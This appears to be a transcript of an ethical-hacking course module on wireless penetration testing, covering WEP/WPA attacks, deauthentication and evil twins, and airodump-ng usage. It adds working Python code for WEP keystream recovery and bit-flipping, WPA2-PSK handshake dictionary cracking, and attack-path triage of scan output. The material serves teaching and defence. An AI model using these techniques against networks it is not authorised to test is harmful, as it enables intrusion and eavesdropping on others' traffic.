[COURSE_PTHE] 15. Wireless

1. Introduction: Wireless Hacking

    This module starts with the basics of encryption and delivers in-depth coverage of wireless intrusion: its concepts, tools and defense techniques.

    This next module in the Penetration Testing and Ethical Hacking series introduces you to the wireless environment and its unique challenges regarding intrusion vulnerabilities.

    Penetrating wireless systems starts with encryption. The Wireless module peels back the layers of encryption, discusses the different wireless protocols, and covers the various types of wireless attacks, including attacks on integrity, attacks on confidentiality, and availability attacks that drive the access point offline. You'll spend a lot of time learning the latest tools currently available, and you'll cover the key wireless mediums, from cellular to air travel to automobiles, and Bluetooth.

    The Wireless module examines wireless networking from its beginnings to the present day, the penetration-testing knowledge it requires, and the pen-testing techniques that will help you defend those environments as an ethical hacker.

    The topics explored in the Wireless module include:

  • Whiteboard, which shows the interrelationship of all the basic components used in this module
  • And the following simulation labs:
    • airodump-ng Lab
    • airmon-ng Lab
    • Kismet Lab

    Hi, Leo Dregier here. This is one of my favorite modules, wireless penetration testing. There is so much to do wirelessly these days; the applications in which we penetrate, penetration test systems, have come leaps and bounds over the last ten years. It all starts with encrypting our networks, so there are multiple types of encryption. We are going to take apart WEP and WPA and WPA2 and all that fun stuff, and we are going to look at the different types of attacks, whether it be attacks on integrity and attacks on confidentiality, or availability, like knocking access points offline. The whole war-driving concept, whether you are driving a car or flying a plane or using a drone nowadays: we will look at the full wireless spectrum and how we can use that to our advantage, and you are going to spend a lot of time on the most popular tools out there, so literally the latest and greatest stuff. But before we can get to the advanced stuff we have got to start one foot in front of the other, and we are going to start from the beginning and go all the way to the end. We will cover a little bit on Bluetooth, only because that is considered wireless, but that is realistically its own module. Then lastly we will wrap up with how to defend against people poking and prodding your wireless networks. So let us go ahead and get started.

 

2. Framework

    This whiteboard lecture video covers wireless hacking in depth. Wireless technology is continually growing, whether in wireless LAN technology and WiFi or in other applications such as cordless telephones, smart homes, and embedded devices. Each of these new technologies comes with its own set of security issues and new opportunities for attackers.

    The field of wireless penetration testing is huge; this is its own field of study, and there is a lot in this module. So let us take a closer look. Some of the basic concepts here are how wireless networks are integrated into the corporate environment. They can often become an extension of what we consider the wired network. They typically have multiple access points, so that is multiple areas of attack. We also have 3G and 4G hotspots, or they could be an extension from one local area network to another local area network. Nonetheless, that is a great opportunity for the penetration tester.

    To realistically be an expert in this field you have to know a lot of the basics of wireless transmission. So let us look at the standards: you are going to need to know all of the 802.11 series, a, b, g, i, n, and 802.16. 802.11a is the first standard in the series, and it operated on the 5 GHz frequency. Then b/g compatible was very, very popular; b was a little bit slower at 11 megabits per second, and then g up to 54 megabits per second, but nonetheless they operated in the 2.4 GHz spectrum. Then you have 802.11i, which is where WPA2 was introduced; we have 802.11n; and we have 802.16, which is commonly referred to as WiMAX. Also there are major components here. You have the SSID, which is the name of our access point. You have the concept of open authentication, where anybody can connect to an access point, which I don't recommend because you are effectively just giving away access to it. I get a lot of people that always say, "Hey, there is nothing on my network anyway." It doesn't matter if there is nothing private or nothing sensitive on your network; if your network gets used to go attack some target, well, you are now downstream liability. So that is going to be a huge problem. Then there is the whole subject of shared key authentication, which is a pre-shared key that we will give to our clients and use to connect to the access points. So ultimately wireless pen testers are interested in cracking them. Then you have authentication components, and then you have BSSIDs, effectively the MAC addresses of your access points, and this is going to be pretty critical, especially when we get into running tools like aircrack-ng, because you are going to need to get the MAC address of your access point and then use that in the configurations.

    Before we get into the detail, let us go up here to the antennas. There are different types of wireless antennas that are used. I highly recommend just going to Google Images and searching for these types of antennas so that you can see a picture and be able to identify them by what they look like, but the categories are directional antennas, omnidirectional antennas, parabolic antennas, yagi antennas (these are things our grandparents might have seen on top of their televisions; think rabbit ears), and then dipole antennas.

    Let us move down here to attacks. There are all sorts of attacks, and in a second I will break them down into confidentiality, integrity and availability style attacks, but some of the basic concepts here are: war driving, where we are driving around looking for access points, and the derivatives of that, which we will talk about. Rogue access points: setting up an unauthorized access point. Somebody connects to your rogue access point and then you get a copy of all of the traffic as it gets relayed to the real access point. MAC spoofing is an attack because effectively the 802.11 standard works at layer 2 of the OSI model, so one of the things we need are MAC addresses; if you can spoof the MAC address of a gateway or an access point, that is huge. We are always looking for access point misconfigurations; default settings, so that is an attack within itself. Ad hoc associations, ad hoc meaning anybody can connect. Promiscuous mode clients, in which basically the client is in listen-only mode, so they can eavesdrop on traffic. And then of course client mis-associations along with access point mis-associations. These are important because any mis-association, whether it is on the client or the access point, is an opportunity for the pen tester to go and start exploiting.

    Otherwise we can go up here to basic styles of attack, and this is just some of the basic theory behind how we go around and approach penetration testing. For example, we are driving a car looking for access points (war driving); we are flying, like a little drone or something, looking for access points (war flying); we are walking, just walking around doing it (war walking); and I guess there could even be war bicycling if we wanted. Otherwise we have war chalking: specifically, these are symbols with which access points can be disclosed. For example, closed access points are usually denoted as a circle, open access points are like two reversed half-moons, and if there is a W in the symbol that typically means there is encryption. It really got its start originally with WEP, but now I would just associate that with any encryption.

    So to effectively attack wireless networks you are going to have to understand some basics of encryption, and this is a whole category all by itself. The first thing is the WEP algorithm, which uses the Rivest Cipher, or RC4, stream cipher, and it comes in a bunch of different flavours in terms of its key size: you have 64-bit, 128-bit, 256-bit, but because it is RC4 it uses a 24-bit initialization vector. Later on, WPA also used RC4, but it changed its initialization vector size to 48 bits. An initialization vector, simply stated (if you look for alternative names for an initialization vector), is basically a starting point: initialization, and vector means direction and map, so the starting direction of the encryption process through the algorithm. WPA changed to a 48-bit initialization vector because with a 24-bit initialization vector there are only 16,777,214 combinations of it, and you could easily just exhaust 16 million of something with today's computing power, so they changed to a 48-bit initialization vector, which is a much larger keyspace. You have to understand the basics of TKIP; this uses a 64-bit message integrity code, or MIC. What I recommend here is to just do a basic Wikipedia search on each one of these: WEP, TKIP, AES, CCMP. That is more than enough to get the background on where this stuff comes from. So TKIP is the Temporal Key Integrity Protocol, or the time-based changing of your keys. You have AES, defined in 802.11i, which is good, strong encryption, as opposed to RC4, which is not really one of the best encryption algorithms. Then you have your Extensible Authentication Protocols; this is another great thing to look up on Wikipedia, because it will actually list out all of the different types of Extensible Authentication Protocol. Then of course you have WPA2, which supersedes WPA, and this is our first really FIPS 140-2 compliant wireless standard, if you will, which can operate in a standalone mode, or you can do WPA2 Enterprise, which is now connecting your wireless infrastructure to some sort of corporate infrastructure and using something like RADIUS or TACACS to actually handle the identification, authentication, authorization and accounting components. Then you have the whole LEAP and PEAP and all of the things that end in EAP; these also fall into the authentication and encryption world. So this is huge, and then there is the whole subject of temporal keys in itself, because you have to understand the four-way handshake: ANonces and things like that, message integrity codes, or pairwise transient keys. All of this stuff is easily looked up on Wikipedia, so I don't want to get into the details of all of the encryption.

    Now, you absolutely are going to see the surface on which we are configuring the access points and doing our penetration testing in a hands-on format here shortly. Before we get into some of the specific styles of attack, I want to go down here to some of the popular tools. There is no shortage of tools here in the wireless section; again, this could take months and months and months to really master this content. But you do have some common tools that I want to highlight: tools like inSSIDer, NetSurveyor, NetStumbler, WirelessMon, or even commercial tools like CommView, or even websites like WiGLE, or even something like Kismet, which is a great Kali/BackTrack scanner, or Wireshark, which we talked about in the sniffing modules. Other than that there are really two other categories: you have aircrack-ng, which is its own suite of tools which will take you months to master in itself, and it is tough because there are a lot of configuration options there. And then there is also the whole subject of mobile tools: mobile surveying tools and sniffing tools and hacking and exploitation tools. They have come years ahead of themselves in the last five years or so, it being 2014 now.

    Otherwise the next best thing to do is to really look at the styles of wireless attack from the principles, meaning confidentiality, integrity, authentication, availability and things like that. So let us take a look at some availability-style attacks. My favorite is jamming the signal; you have hardware jammers, you have software jammers, but basically the principle here is knocking someone offline, so they can't play either. You could just steal the access point. You could force all of the clients to disassociate, therefore knocking everybody offline. You could flood the device with EAP failures, therefore overwhelming the access point. You could do beacon floods, again overwhelming the access point, knocking it offline or making it temporarily unavailable. You could do a distributed denial of service style attack or a denial of service attack. You could de-authenticate: you send a bunch of de-authentication requests (these are called de-authentication floods) to the access point. You could intervene with a routing-style attack. You could not only flood it with de-authentication floods but also with authentication floods. You could manipulate the ARP cache of the access point. You could try to send the signal to the access point to put it in power-saving mode, so just shut it down. Or you can get into specific exploits like TKIP and MIC attacks, and you can look these up within the Metasploit Framework and things like that.

    Confidentiality-style attacks focus on disclosure-oriented attacks. This is where you have things like eavesdropping using a packet sniffer, something like Wireshark or tshark or something to that effect, or you could chalk that up to traffic analysis. You could try to crack the WEP key; if the WEP key is disclosed to you, or the encryption key is disclosed to you, that is now no longer secret. You could set up an evil twin access point, so everybody connects to your evil twin and then you forward the traffic on to the real access point, therefore getting a copy of everybody's traffic. You could set up a honeypot or even a honeynet. You could do a session hijacking attack: let someone connect to your wireless network legitimately and then just take over their existing session. You could masquerade as someone else, or you could go just full-blown man-in-the-middle attack.

    Meanwhile you have integrity-style attacks like data frame injection. The key to an integrity attack is that it is changing, modifying or altering something within the network traffic. So with data frame injection you are inserting data in, therefore changing the integrity of the network or the traffic; that is the attack. WEP injection, data replays, initialization vector attacks, even bit-flipping attacks, or access point replay attacks, or even replaying server information, or even creating your own network virus. Then you could focus just on authentication, like focusing on how the access point shares its pre-shared key. You could focus on the type of authentication, like PEAP or LEAP, or go after the login portal itself, like a VPN login portal or the access point login, or try to collect the domain information if it is linked to something like Kerberos, which ultimately could result in things like identity theft: steal somebody else's identity and then pretend to be them when you are actually logging in. Or simply just guess the key. Otherwise that is the basic framework of what happens in the wireless world.

    So let us look at some basic countermeasures here, if you would try to stop the penetration tester. What could you possibly do? I personally would say not much, but let us start somewhere. Try using non-regular PIN keys. In other words, we normally go to our keypads and we can do 1,2,3,4 or A,B,C,D, but there are certain other sequences that we can also use that are non-standard; this definitely slows the penetration tester down. You should use the latest, greatest and strongest encryption; that probably goes without saying. I personally laugh when I see something that is encrypted with WEP because I only need about five minutes to crack the key. You should always monitor any sort of pairing of devices between the client and the server: monitor the traffic, monitor the relationship of the client and server. Put your devices in non-discoverable mode or hidden mode; now, that can be a deterrent, but to me it is just: why are they trying to hide things? Simply stated, if you turn off your SSID broadcasts you are probably trying to hide something, something a little more valuable, and I am probably going to go after you first, just for shutting it off, as opposed to the run-of-the-mill person who has their SSID in broadcast mode. So that is a little controversial in itself. You should use strong authentication, meaning something that you have and something that you know. Use multi-layered security, like, for example, the OSI model: don't just rely on layer 2 techniques like MAC filtering or layer 3 techniques like route filtering, but use as many layers as you possibly can; otherwise it is known as defense in depth. The best practices will suggest you could turn off SSID broadcast, but you guys already know how I feel about that. Shut off the remote access capabilities of it, so you have to physically access it, and that creates its own set of challenges. You should absolutely change the defaults; any time you have a default, that is something I can go after as a pen tester. You should use MAC filters or time-of-day filters. Physically secure it: bunny ears popping out of the ceiling I wouldn't consider physically secured. If you can, put it in a wiring closet where it is actually physically blocked. In theory you can use isolation, but the countermeasure to that is I can use some sort of amplification to get access or increase the signal strength. Also you should use intrusion detection or intrusion prevention systems, or just start penetration testing practices or best practices in themselves.

    So as you can see there is a lot that goes on in the wireless world. This is absolutely its own field of study; there are several certifications that map to this, but what I find in the world of computer people is that either there are really good people with wireless or there are not at all. There is no middle ground, and so we are trying to change that, you know; we want to get everybody familiar with the basics of wireless. Not everybody has to be a wireless pen tester, but some simple basics go a very, very long way toward stopping people from eavesdropping or doing integrity attacks or availability attacks or disclosure attacks on your network. To keep all of this in mind, let us look at some hands-on examples.
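The 24-bit initialization vector and the bit-flipping attack mentioned on the whiteboard, as an added example that is not part of the course: a toy WEP in Python showing why IV reuse under RC4 gives away plaintext, how the linearity of the CRC-32 ICV lets an attacker modify an encrypted frame without knowing the key, and how the birthday bound turns 16.7 million IVs into a few thousand frames. The key, IV and frame contents are constructed; the framing itself (3-byte IV sent in the clear, RC4 keyed with IV || key, CRC-32 ICV) is how WEP works.

```python
"""WEP in miniature: RC4 keystream reuse, CRC-32 bit flipping, IV birthday bound.

Added example, not from the course. Key, IV and frames are constructed; the WEP
framing (3-byte IV in the clear, RC4 keyed with IV||key, CRC-32 ICV) is the real one.
"""
import math
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA); XOR-based, so encrypt == decrypt."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV||key, plaintext || ICV). A 5-byte key plus the
    24-bit IV is the '64-bit' WEP-40 the lecture mentions (13 bytes -> WEP-104)."""
    icv = struct.pack("<I", zlib.crc32(plaintext))
    return iv + rc4(iv + key, plaintext + icv)


def wep_decrypt(key: bytes, frame: bytes):
    """Return the plaintext if the ICV verifies, else None (receiver drops the frame)."""
    iv, body = frame[:3], frame[3:]
    dec = rc4(iv + key, body)
    plaintext, icv = dec[:-4], dec[-4:]
    return plaintext if struct.pack("<I", zlib.crc32(plaintext)) == icv else None


def recover_via_iv_reuse(frame_known: bytes, known_plaintext: bytes, frame_target: bytes) -> bytes:
    """Same IV + same key = same keystream, so C1 xor C2 = P1 xor P2.
    With P1 known (the LLC/SNAP + ARP header is fixed bytes) the keystream
    prefix falls out and decrypts that many bytes of any other frame under that IV."""
    assert frame_known[:3] == frame_target[:3], "IVs differ, keystreams differ"
    keystream = bytes(c ^ p for c, p in zip(frame_known[3:], known_plaintext))
    return bytes(c ^ k for c, k in zip(frame_target[3:], keystream))


def bit_flip(frame: bytes, delta: bytes) -> bytes:
    """Integrity attack without the key. CRC-32 is linear over XOR:
    crc(P ^ D) == crc(P) ^ crc(D) ^ crc(zeros), so XOR D into the ciphertext and
    XOR the matching correction into the encrypted ICV; the receiver's check passes."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4                       # payload length without the ICV
    delta = delta.ljust(n, b"\x00")
    icv_fix = zlib.crc32(delta) ^ zlib.crc32(b"\x00" * n)
    mask = delta + struct.pack("<I", icv_fix)
    return iv + bytes(b ^ m for b, m in zip(body, mask))


def frames_until_iv_collision(probability: float = 0.5, iv_bits: int = 24) -> float:
    """Birthday bound: frames sent before some IV repeats with the given probability."""
    return math.sqrt(2 * (2 ** iv_bits) * math.log(1 / (1 - probability)))


if __name__ == "__main__":
    key, iv = b"\x01\x02\x03\x04\x05", b"\x00\x00\x01"      # constructed WEP-40 key and IV
    header = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"             # LLC/SNAP + EtherType ARP
    f1 = wep_encrypt(key, iv, header + b"secret-frame-1")
    f2 = wep_encrypt(key, iv, header + b"target-payload")
    print(recover_via_iv_reuse(f1, header + b"secret-frame-1", f2))
    print(wep_decrypt(key, bit_flip(f2, b"\x00" * 8 + b"\x1c\x00\x11\x0c\x00\x10")))
    print(round(frames_until_iv_collision()))
```

The collision figure is why `airodump-ng --ivs` exists: a busy AP repeats an IV after roughly 4,800 frames at even odds, and ARP replay (aireplay-ng) forces the AP to generate new IV'd frames on demand. The bit-flip shows why WEP's "integrity" is not integrity; TKIP's keyed MIC (Michael) and CCMP were the fix.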
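The four-way handshake, pairwise transient key and message integrity code that the whiteboard points to, as an added example that is not part of the course: this Python script derives the PMK and PTK the way 802.11i specifies, recomputes the EAPOL-Key MIC, and runs the dictionary attack that aircrack-ng performs on a captured handshake. The SSID `IEEE` / passphrase `password` pair is the PBKDF2 test vector published in the standard; the MAC addresses, nonces, EAPOL frame and wordlist are constructed for the demo.

```python
"""WPA/WPA2-PSK: PMK -> PTK -> EAPOL-Key MIC, and the dictionary attack on it.

Added example, not from the course. MAC addresses, nonces, the EAPOL frame and
the wordlist are constructed; the PBKDF2 vector (SSID "IEEE", passphrase
"password") is the published 802.11i test vector.
"""
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, nbytes: int = 48) -> bytes:
    """PTK = PRF(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN)).
    CCMP needs 48 bytes (KCK 16 || KEK 16 || TK 16); TKIP needs 64."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


# Offset of the Key MIC inside an EAPOL-Key frame: EAPOL header 4 + descriptor type 1
# + key info 2 + key length 2 + replay counter 8 + nonce 32 + IV 16 + RSC 8 + ID 8.
MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol_frame: bytes, wpa2: bool = True) -> bytes:
    """Key MIC = first 16 bytes of HMAC over the frame with the MIC field zeroed.
    Descriptor version 2 (WPA2/AES) uses HMAC-SHA1, version 1 (WPA/TKIP) HMAC-MD5."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def build_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (supplicant -> AP), MIC field still zero."""
    body = struct.pack(">BHH", 2, 0x010A, 16)        # RSN descriptor, key info (v2|pairwise|MIC), key length
    body += struct.pack(">Q", 1)                      # replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)  # SNonce, key IV, RSC, key ID
    body += bytes(16)                                 # Key MIC placeholder
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK RSN element
    body += struct.pack(">H", len(rsn_ie)) + rsn_ie
    return struct.pack(">BBH", 1, 3, len(body)) + body  # EAPOL v1, type 3 = Key


SSID = "IEEE"
AA, SPA = mac("02:00:00:00:00:01"), mac("02:00:00:00:00:02")   # constructed AP / client MACs
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))         # constructed nonces


def capture_handshake(passphrase: str) -> bytes:
    """Stand-in for the pcap that airodump-ng -w writes: message 2 with the genuine MIC."""
    frame = build_msg2(SNONCE)
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_psk(captured: bytes, wordlist):
    """What aircrack-ng -w does: rederive the KCK per candidate and compare the MIC."""
    observed = captured[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, SSID), AA, SPA, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, captured), observed):
            return candidate
    return None


if __name__ == "__main__":
    frame = capture_handshake("password")
    print(crack_psk(frame, ["letmein", "Cybrary", "password", "hunter2"]))
```

With a real capture you pull AA, SPA, ANonce, SNonce and message 2 (or 3) out of the pcap; the derivation is identical. The 4096-iteration PBKDF2 is the only expensive step, which is why the practical defence is a long non-dictionary passphrase, and why precomputed tables are only good for one SSID.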

 

3. Using airodump-ng

    Get a hands-on approach to airodump-ng with this lab video in our Penetration Testing and Ethical Hacking course series.

    This lab demonstrates airodump-ng, a great utility for dumping captured wireless traffic to a defined location for further analysis. You'll learn the proper launch syntax, interface selection and other output options, including selection criteria specific to your monitoring session.

    In this lab I want to talk about airodump-ng. Now, this lab I generally run after I run the airmon-ng setup, which you want to see in a previous lab, but airodump-ng is a great program to run from the command line. It is basically set up to start dumping traffic and give you a summary of what is actually going on, depending on how you actually want to set it up. So we are going to run airodump-ng and set it up as a listener, but first you have got to type it correctly. It is airodump-ng -h, and that will bring you to the help file, and you are going to want to read this information through at least once, especially if you are not familiar with it. So basically the command is relatively simple: it is just airodump-ng, any sort of options, then the interface or interfaces that you want to monitor simultaneously. I generally only run this on one interface at a time, but it can support multiple interfaces.

    Otherwise let us cover the options. You have got --ivs, dump only the initialization vectors. You can set it up to work with a GPS server. You can do --write or -w; these are effectively the same thing, and this allows you to dump to a file. You can record only the beacon information from the access points. You can update at a particular interval, for example every three seconds, flushed to your screen. You can show acknowledgements; this prints the acknowledgements and their retries and some basic statistics. I generally stay away from that, especially at first. You have got -h, which here is not help but hides known stations. This is helpful because once you find the station that you want to target, you really want to filter out all of the other stations that you are not interested in. You have got -f here; this is the time between channel hopping. You have got --berlin; this is the time before removing an access point or client from the screen when no more packets are received; in other words, if you don't hear from it for so long, let us clear it out from what we are looking at. -r, for read, basically reads from a file. -x, active scanning simulation in milliseconds. --manufacturer sets the manufacturer column. --output-format sets the output format, and I do typically use this because this is actually helpful for documentation; the formats that are supported are pcap, ivs, csv, gps, kismet and netxml. --ignore-negative-one removes the messages that say "fixed channel ... -1". Otherwise you have some basic filtering options and how you can sort this, if you want to sort by encryption or netmask or BSSID, etc., etc. So it is relatively easy to use once you understand some basics about wireless sniffing and pen testing, which we will get into.

    Okay, so basically to set this up, I am just going to run a capture for the initialization vectors, and I am going to do this on my wireless interface. It is airodump-ng, --ivs or whatever option you want, and the interface you want to capture with. So once I do that, then you get to see the different items and how they come in. At first it may look a little goofy in terms of refreshing and things like that, but it is not that bad; it really isn't. So a couple of things here. You have your BSSIDs; you are always interested in these because these are basically the MAC addresses of the access points, and remember that these are a six-byte field. The first half is your manufacturer and the rest is unique per device. So I am looking for 00:1F:90; that tells me common manufacturers that are in play. This is helpful when you are looking at a group of access points. Next I have got the power, which is the signal level. I have got the actual beacons; this is the number of announcements, the packets sent by each access point. I have got #Data; this is the number of captured data packets, for example the unique initialization vector count and things like that. So you can see I have got a couple of higher initialization vector players on the network. I have got #/s; this is the number of data packets per second, measured over the last ten seconds, so in this case not a lot of traffic on the network. I have got the channel it is on, so almost everybody here around me is going to be on channel 1. I have got MB; this is the maximum speed supported by the access point, so in this case I am basically at 54. The dot after 54 indicates that short preamble is actually supported; I would not worry about that for now, but it does mean something later when we get into the advanced stuff. You have got ENC for the encryption algorithm that it thinks it can enumerate. So here is an open access point, here is WEP, here is WPA2, etc. Then the actual cipher: these ciphers could include anything from CCMP, WRAP, TKIP, WEP, WEP40, WEP104 (which, keep in mind, subtracts the 24-bit initialization vector, because normally we would call those 64 and 128, but if you subtract the 24-bit initialization vector it is 40 and 104 accordingly), and/or TKIP is an option here for the cipher type. Then the authentication protocol that is supported. So in this case you can see all of them are set up as pre-shared keys; that is huge all in itself, because what I can enumerate here is whether they are basically relaying the authentication to some sort of RADIUS or TACACS client or whether this is basically just a pre-shared key. Since these are all pre-shared keys, then I have got a couple of choices of how to attack this type of network: 1. go find the pre-shared key. It is written on the conference room boards, offices, cubicles, trash cans, on the actual bottom of the devices, if I can get access to the actual devices and things like that. And then of course the extended service set identifier; this is the so-called SSID, for lack of better words. Then you have also the station itself down here. So the station is the MAC address of each associated station, or stations actually connected to the actual access point. I have also got Lost; this is the number of data packets lost over the last ten seconds. The number of packets, the number of frames, the number of probes, all of which can be useful depending on the attack that you are actually using.

    So if you notice here, if I scroll to the top, you have got channel 6, elapsed one minute; this is the status update at the top here, and basically it goes into the core of what you are finding, which looks very, very similar to what you would see if you were to go to your wireless network adapter card, and then basically a summary of the BSSID, the station, the power, rate, lost, frames and probes. So when you are done, you can just go ahead and hit Ctrl-C and that will stop it. And again, capturing initialization vectors was extremely, extremely easy to do; it was basically airodump-ng --ivs wlan0. But let us say I want something different. Say I am not interested in the initialization vectors and I want the actual beacons. You just change --ivs to --beacons here and it will go through, and you will see all the beaconing access points, and basically it will simply count the number of beacons here. Right here, so in this case I have got the NSA van outside; this looks like it is sending a lot of beacons out at the moment. So that is it, very simple programs to use. Hope you enjoyed the video, and I will see you in the next wireless pen testing lab. Thank you for watching, my name is Leo Dregier, and don't forget to check us out, if you haven't already by now, on Facebook, LinkedIn, YouTube and Twitter.
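A triage script for the airodump-ng output the lab walks through, added here and not part of the course: it reads the CSV that `airodump-ng -w <prefix> --output-format csv` writes, maps each access point's Privacy/Cipher/Authentication columns (ENC, CIPHER and AUTH on screen) to the attack path the lecture mentions, counts associated stations per BSSID, and lists the ESSIDs that unassociated clients are probing for, which are the evil-twin candidates. The CSV text is constructed to match the real column layout; the MAC addresses are locally administered (02:...) placeholders rather than any vendor's OUI.

```python
"""Triage an airodump-ng CSV dump.

Added example, not from the course. The CSV is constructed to match the column
layout of `airodump-ng -w <prefix> --output-format csv`; BSSIDs use the locally
administered 02:... range so they do not belong to any real vendor.
ESSIDs containing commas are not handled (airodump-ng does not quote them).
"""
import csv
import io
from collections import Counter

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:1F:90:00:00:01, 2014-05-01 10:00:01, 2014-05-01 10:05:01,  1,  54, WEP , WEP , OPN, -41,      120,    38412,   0.  0.  0.  0,   7, Cybrary,
02:1F:90:00:00:02, 2014-05-01 10:00:02, 2014-05-01 10:05:01,  6,  54, WPA2, CCMP, PSK, -60,       80,        0,   0.  0.  0.  0,   6, Office,
02:1F:90:00:00:03, 2014-05-01 10:00:03, 2014-05-01 10:05:00, 11,  54, WPA , TKIP, PSK, -70,       55,        0,   0.  0.  0.  0,   5, Guest,
02:1F:90:00:00:04, 2014-05-01 10:00:04, 2014-05-01 10:04:59,  1,  54, OPN ,     ,    , -75,       40,        0,   0.  0.  0.  0,   9, FreeWiFi!,
02:1F:90:00:00:05, 2014-05-01 10:00:05, 2014-05-01 10:04:58,  6,  54, WPA2, CCMP, MGT, -80,       30,        0,   0.  0.  0.  0,   0, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:AA:00:00:00:01, 2014-05-01 10:00:10, 2014-05-01 10:05:00, -50,      900, 02:1F:90:00:00:01, Cybrary
02:AA:00:00:00:02, 2014-05-01 10:00:11, 2014-05-01 10:05:00, -55,      120, 02:1F:90:00:00:01,
02:AA:00:00:00:03, 2014-05-01 10:00:12, 2014-05-01 10:04:59, -65,       40, 02:1F:90:00:00:02, Office
02:AA:00:00:00:04, 2014-05-01 10:00:13, 2014-05-01 10:04:58, -72,       10, (not associated), Office,Cybrary,HomeNet
"""


def _rows(section: str):
    """Header list plus stripped data rows for one section of the dump."""
    reader = csv.reader(io.StringIO(section), skipinitialspace=True)
    rows = [[c.strip() for c in r] for r in reader if r]
    return rows[0], rows[1:]


def parse_airodump_csv(text: str):
    """The file is two CSV tables (APs, then stations) separated by a blank line."""
    ap_part, sta_part = text.strip().split("\n\n", 1)
    ap_hdr, ap_rows = _rows(ap_part)
    sta_hdr, sta_rows = _rows(sta_part)
    aps = {r[0]: dict(zip(ap_hdr, r)) for r in ap_rows}
    stations = []
    for r in sta_rows:
        rec = dict(zip(sta_hdr[:6], r[:6]))
        rec["Probed ESSIDs"] = [p for p in r[6:] if p]   # probes are comma separated
        stations.append(rec)
    return aps, stations


def triage(aps, stations):
    """Map ENC/CIPHER/AUTH to the attack path the lecture describes, busiest AP first."""
    clients = Counter(s["BSSID"] for s in stations if s["BSSID"] != "(not associated)")
    findings = []
    for bssid, ap in aps.items():
        priv, cipher, auth = ap["Privacy"], ap["Cipher"], ap["Authentication"]
        if priv == "OPN":
            issue = "open network: eavesdrop or evil twin, no key needed"
        elif priv == "WEP":
            issue = f"WEP with {ap['# IV']} IVs captured: aircrack-ng against the .ivs/.cap"
        elif "WPA" in priv and auth == "PSK":
            issue = "WPA/WPA2-PSK: capture the four-way handshake, then dictionary-attack the PSK"
            if cipher == "TKIP":
                issue += " (TKIP only: also exposed to Beck-Tews style MIC attacks)"
        elif auth == "MGT":
            issue = "WPA2-Enterprise (RADIUS): target the EAP method or a rogue AP, not a PSK"
        else:
            issue = "unclassified"
        findings.append({
            "bssid": bssid, "essid": ap["ESSID"] or "<hidden>", "channel": int(ap["channel"]),
            "clients": clients[bssid], "hidden": ap["ID-length"] == "0" or not ap["ESSID"],
            "issue": issue,
        })
    return sorted(findings, key=lambda f: f["clients"], reverse=True)


def probed_by_unassociated(stations) -> Counter:
    """ESSIDs that roaming clients are asking for: an evil twin answering to one
    of these gets an automatic client mis-association."""
    return Counter(p for s in stations if s["BSSID"] == "(not associated)" for p in s["Probed ESSIDs"])


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for f in triage(aps, stations):
        print(f"{f['bssid']} ch{f['channel']:>2} {f['clients']} clients {f['essid']:<10} {f['issue']}")
    print("probed by unassociated clients:", dict(probed_by_unassociated(stations)))
```

Point it at `<prefix>-01.csv` from a real run and the ranking tells you where the clients are, which is what decides whether a deauth-and-capture or an evil twin is the quicker path.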

 

4. Using airmon-ng

    The next Wireless lab in the Penetration Testing and Ethical Hacking series introduces airmon-ng.

    airmon-ng is a monitor-mode utility. It's used in conjunction with the iwconfig utility to confirm that your capture interface is in monitor mode.

    The airmon-ng lab also demonstrates how you can begin analysis, testing, or packet injection for the penetration-testing task you want to execute.

